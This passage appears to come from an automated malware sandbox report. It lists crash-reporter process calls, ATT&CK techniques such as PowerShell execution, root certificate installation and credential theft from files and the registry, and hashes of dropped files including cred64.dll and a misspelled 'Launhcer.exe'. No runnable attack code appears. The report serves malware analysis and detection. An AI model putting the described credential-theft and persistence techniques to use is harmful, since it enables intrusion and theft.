PID:3576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1516 -ip 1516
1⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1516 -ip 1516
1⤵
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1516 -ip 1516
1⤵
PID:1204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1516 -ip 1516
1⤵
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3552 -ip 3552
1⤵
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3552 -ip 3552
1⤵
PID:3916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3552 -ip 3552
1⤵
PID:4004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3552 -ip 3552
1⤵
PID:888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3552 -ip 3552
1⤵
PID:1008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3552 -ip 3552
1⤵
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3552 -ip 3552
1⤵
PID:3300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3552 -ip 3552
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3552 -ip 3552
1⤵
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3552 -ip 3552
1⤵
PID:3364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3552 -ip 3552
1⤵
PID:2052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3552 -ip 3552
1⤵
PID:4044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3552 -ip 3552
1⤵
PID:1392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3552 -ip 3552
1⤵
PID:112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
76b52ccdb5682f80e9830a765e4f9604

SHA1
e0f063114a8463b5a6f44858738a7ffdc2fe9061

SHA256
2428d24df851b6e7b5cfa7a1d76e19e0f853ae0f63d95675d1e6d2f73685ee7e

SHA512
af544fcaf4702a619aeaa1534069fcfd82afd74402d6a58318ebd949ee47d55fc0043aa87a499864174e5cda1b47bd0ba0f90d441f974de1c50840b21a8fefad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
089459c8d686ef358cbb96e4a8087cf0

SHA1
3826286e990188cd72563c06b742b14e821949d9

SHA256
d5ad6120640c9f591839f60f1351f41c5e4daf3b262f95a8cf94713dd07f717b

SHA512
e5ff14e01f295d9c14b303ca505d9b5a9a0b36b6b41990f0728c98cf5f82cf1f2a15f512be65a30289cb803d917752236231c296185fdc3b0284f70a17360a60

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000012011\988d497ab3.dll

Filesize
2.3MB

MD5
502f859ec674fb1023764e93921b5542

SHA1
4e80c651043d2dc1c682ef9fe9e5181abd399adf

SHA256
ae9d87a76527f3d3df30a62db1fab2a669d73c3f3cdd3b366016142036056e40

SHA512
83e65d572d12c4ba2278366e225a3e7842bebbc0108f3de0d319b5504d6c2d9c99157a29e476fb6c1da28f69652565f1a1fcf7b74ed3713a097de7e40d158392

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wzd5ucll.sc4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll

Filesize
1.2MB

MD5
5018b05026a59499aadb6ec08f4a0390

SHA1
e92da4c4350064d7f9dcc4afbbc48a8ed317a352

SHA256
095ded227779ff91573f4e2174e31ded242a0c452ceefd0d1bb2761ffa19977c

SHA512
47742751f577453cb155cf7f88c23df3cd21163f1844fb14f94239fac121712320fd312b6557d173bdeb2b0b6da74cb7ab2a573aa11828e54db325c32aeacdca

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

Filesize
12B

MD5
4332e63ed4651ab6163297a1b3521b15

SHA1
1ba54cde45c9205f18fa4642b8d2430719063cc6

SHA256
6111f7bddb6f125b3046c765ac210a0ab0704f9ffdb8af232e8e321a842b5c62

SHA512
f17f06c5d367523927a1a134bbd0f90743e176d7be991207409bab8fac460ec0505ecc9316e58c66c5d470d7b281fd25785b196e571f3480c39af4c97ae1d83a

Download Submit
C:\Users\Admin\AppData\Roaming\services\01plugins17774.rar

Filesize
2.9MB

MD5
5829add10b7f66e9fb891a34faab675e

SHA1
0bd24bfa4dc7739968051d530755a3265d8a2fe4

SHA256
2f88ec677b3c1b92c76500482f59c5b0172c44abb50d44fb0894f8d15e54b6ec

SHA512
54cb436a34d1c69eeb03d95d4fcd6ef39893de64dfd193a48f14144f9c958f44427b609c1004cca9546a3e7860dcf6acc4fbd1311f5004f71013689000d46c0a

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins13079.rar

Filesize
9.6MB

MD5
abd187f0e53c1502113774b5be2be89b

SHA1
70d90546bb191892666ba0dbc8330137f5593c67

SHA256
763eaffad962a810443b3b47e45ba17f8d57bf1f65c21416840c6f2bbb3ce82c

SHA512
17a0c3bffdec3f38b3fe15c42608561f4bab8cbd43208c652628b603d665eb0ced9a7bc2f1479b3b33654e88cc7587fc11c4d643437eab6fef9a7ac909172460

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins17346.rar

Filesize
2.9MB

MD5
aeac6a1a5a22e7e29423e30d6c74c679

SHA1
c6f6461b140287d073361fc184571821ccb54e90

SHA256
8db6963e7dc66543cbe264316585e01f7cbc5014929cb614bb1b0dd847a24e85

SHA512
9e26ac6a41ee390b1f2aaebf6d33a79e4bdc175439f396de504891f7749411f385bc92639b2b5e88efd8b3d301580b157bc0e2ed11e63a51a0b1878217e41e9b

Download Submit
C:\Users\Admin\AppData\Roaming\services\2plugin29017

Filesize
7.3MB

MD5
26427f98c7f37c1472d0bb2e8fac6a19

SHA1
d1fb3f199565b9a84d39eb23da8d6c7858cda859

SHA256
827142857439abbdcd5c849637ac98987f1b1b38c39049bb8ad10914b306150a

SHA512
de610f72e71fb5a971d89cad25df789bb2aeec5d47cdf9ad7ede1301e1ec54814a4a692c391aaba681454498e45de28ae320eebe295000ae6ff6e4e8c03e7f32

Download Submit
C:\Users\Admin\AppData\Roaming\services\3plugin14170

Filesize
406KB

MD5
a6cb8ead79badac2f7c62036a6be1980

SHA1
861883f46cd670ce671ffe0961ea3fe493afbc3d

SHA256
904977d248102149dd406dd63c659fc922b67b04e2d6b6a5039e0764f4fb0c04

SHA512
5db90066b39a751c6102fef1cfc04cf2946e8742b7ce2cb3c992cb4fc1b31891112df59ee9a8fcb8cd801f391aef7fc9d8c31f93d35c6fdc230b78edd86cd11c

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

Filesize
2KB

MD5
7de0541eb96ba31067b4c58d9399693b

SHA1
a105216391bd53fa0c8f6aa23953030d0c0f9244

SHA256
934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e

SHA512
e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

Filesize
6KB

MD5
f58866e5a48d89c883f3932c279004db

SHA1
e72182e9ee4738577b01359f5acbfbbe8daa2b7f

SHA256
d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12

SHA512
7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

Filesize
364KB

MD5
93fde4e38a84c83af842f73b176ab8dc

SHA1
e8c55cc160a0a94e404f544b22e38511b9d71da8

SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

SHA512
48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\AppData\Roaming\services\plugin4559

Filesize
403KB

MD5
1b7cc96226d6ac15718fbc035435cdfe

SHA1
514747a446585d3922b13de79d3afecbc7d4863b

SHA256
5aec3edecf0c3dc4a49d432f4ca60397e7a83b3080d290d65c7753372b069470

SHA512
f0579757d4bc9385c6bcda0a6b8815fe9b9b6099a877f98a80850ae80d911a90ec0f3b94f86c8b2aed1a54b568fcce9c7d414332b7a673550e977e795ef65fc3

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
4.9MB

MD5
8c04808e4ba12cb793cf661fbbf6c2a0

SHA1
bdfdb50c5f251628c332042f85e8dd8cf5f650e3

SHA256
a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

SHA512
9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

Download Submit
C:\Users\Admin\AppData\Roaming\services\winrar.exe

Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
memory/988-69-0x0000000008100000-0x000000000877A000-memory.dmp

Filesize
6.5MB

Download
memory/988-70-0x0000000007B30000-0x0000000007B3A000-memory.dmp

Filesize
40KB

Download
memory/988-58-0x000000006FFC0000-0x000000007000C000-memory.dmp

Filesize
304KB

Download
memory/988-57-0x00000000078F0000-0x0000000007924000-memory.dmp

Filesize
208KB

Download
memory/988-67-0x0000000007950000-0x000000000796E000-memory.dmp

Filesize
120KB

Download
memory/988-68-0x0000000007970000-0x0000000007A14000-memory.dmp

Filesize
656KB

Download
memory/988-77-0x0000000007D30000-0x0000000007D38000-memory.dmp

Filesize
32KB

Download
memory/988-76-0x0000000007D40000-0x0000000007D5A000-memory.dmp

Filesize
104KB

Download
memory/988-71-0x0000000007CB0000-0x0000000007CC1000-memory.dmp

Filesize
68KB

Download
memory/988-75-0x0000000007D00000-0x0000000007D15000-memory.dmp

Filesize
84KB

Download
memory/988-74-0x0000000007CF0000-0x0000000007CFE000-memory.dmp

Filesize
56KB

Download
memory/1160-82-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/1248-129-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/1516-150-0x0000000000400000-0x0000000002B8F000-memory.dmp

Filesize
39.6MB

Download
memory/1556-41-0x0000000006C50000-0x0000000006CE6000-memory.dmp

Filesize
600KB

Download
memory/1556-42-0x0000000006200000-0x000000000621A000-memory.dmp

Filesize
104KB

Download
memory/1556-40-0x0000000005D10000-0x0000000005D5C000-memory.dmp

Filesize
304KB

Download
memory/1556-39-0x0000000005CD0000-0x0000000005CEE000-memory.dmp

Filesize
120KB

Download
memory/1556-38-0x00000000058F0000-0x0000000005C47000-memory.dmp

Filesize
3.3MB

Download
memory/1556-37-0x0000000073540000-0x0000000073CF1000-memory.dmp

Filesize
7.7MB

Download
memory/1556-28-0x00000000057A0000-0x0000000005806000-memory.dmp

Filesize
408KB

Download
memory/1556-27-0x0000000005730000-0x0000000005796000-memory.dmp

Filesize
408KB

Download
memory/1556-26-0x0000000004D20000-0x0000000004D42000-memory.dmp

Filesize
136KB

Download
memory/1556-44-0x0000000007350000-0x00000000078F6000-memory.dmp

Filesize
5.6MB

Download
memory/1556-24-0x0000000073540000-0x0000000073CF1000-memory.dmp

Filesize
7.7MB

Download
memory/1556-25-0x0000000004F90000-0x00000000055BA000-memory.dmp

Filesize
6.2MB

Download
memory/1556-43-0x0000000006250000-0x0000000006272000-memory.dmp

Filesize
136KB

Download
memory/1556-107-0x000000007354E000-0x000000007354F000-memory.dmp

Filesize
4KB

Download
memory/1556-108-0x0000000073540000-0x0000000073CF1000-memory.dmp

Filesize
7.7MB

Download
memory/1556-23-0x00000000024D0000-0x0000000002506000-memory.dmp

Filesize
216KB

Download
memory/1556-110-0x0000000073540000-0x0000000073CF1000-memory.dmp

Filesize
7.7MB

Download
memory/1556-22-0x000000007354E000-0x000000007354F000-memory.dmp

Filesize
4KB

Download
memory/2604-95-0x0000000004790000-0x0000000004B90000-memory.dmp

Filesize
4.0MB

Download
memory/2604-99-0x0000000077390000-0x00000000775E2000-memory.dmp

Filesize
2.3MB

Download
memory/2604-106-0x0000000000400000-0x0000000001A2F000-memory.dmp

Filesize
22.2MB

Download
memory/2604-97-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp

Filesize
2.0MB

Download
memory/2604-96-0x0000000004790000-0x0000000004B90000-memory.dmp

Filesize
4.0MB

Download
memory/2708-123-0x00007FFF6B5F0000-0x00007FFF6B5F2000-memory.dmp

Filesize
8KB

Download
memory/2708-124-0x00007FFF6B600000-0x00007FFF6B602000-memory.dmp

Filesize
8KB

Download
memory/2708-125-0x0000000140000000-0x0000000140E43000-memory.dmp

Filesize
14.3MB

Download
memory/3552-190-0x0000000000400000-0x0000000002B8F000-memory.dmp

Filesize
39.6MB

Download
memory/3672-113-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/3672-109-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/3780-200-0x00000234FB770000-0x00000234FB77A000-memory.dmp

Filesize
40KB

Download
memory/3780-199-0x00000234FB780000-0x00000234FB79C000-memory.dmp

Filesize
112KB

Download
memory/3780-201-0x00000234FBB00000-0x00000234FBB08000-memory.dmp

Filesize
32KB

Download
memory/3780-202-0x00000234FBB10000-0x00000234FBB1A000-memory.dmp

Filesize
40KB

Download
memory/3780-173-0x00000234FB270000-0x00000234FB292000-memory.dmp

Filesize
136KB

Download
memory/4028-105-0x0000000077390000-0x00000000775E2000-memory.dmp

Filesize
2.3MB

Download
memory/4028-100-0x00000000008E0000-0x00000000008E9000-memory.dmp

Filesize
36KB

Download
memory/4028-102-0x0000000002500000-0x0000000002900000-memory.dmp

Filesize
4.0MB

Download
memory/4028-103-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp

Filesize
2.0MB

Download
memory/4984-167-0x0000000002E20000-0x0000000002F24000-memory.dmp

Filesize
1.0MB

Download
memory/4984-165-0x0000000002E20000-0x0000000002F24000-memory.dmp

Filesize
1.0MB

Download
memory/4984-164-0x0000000002E20000-0x0000000002F24000-memory.dmp

Filesize
1.0MB

Download
memory/4984-163-0x0000000002CF0000-0x0000000002E12000-memory.dmp

Filesize
1.1MB

Download
memory/4984-161-0x0000000010000000-0x0000000010256000-memory.dmp

Filesize
2.3MB

Download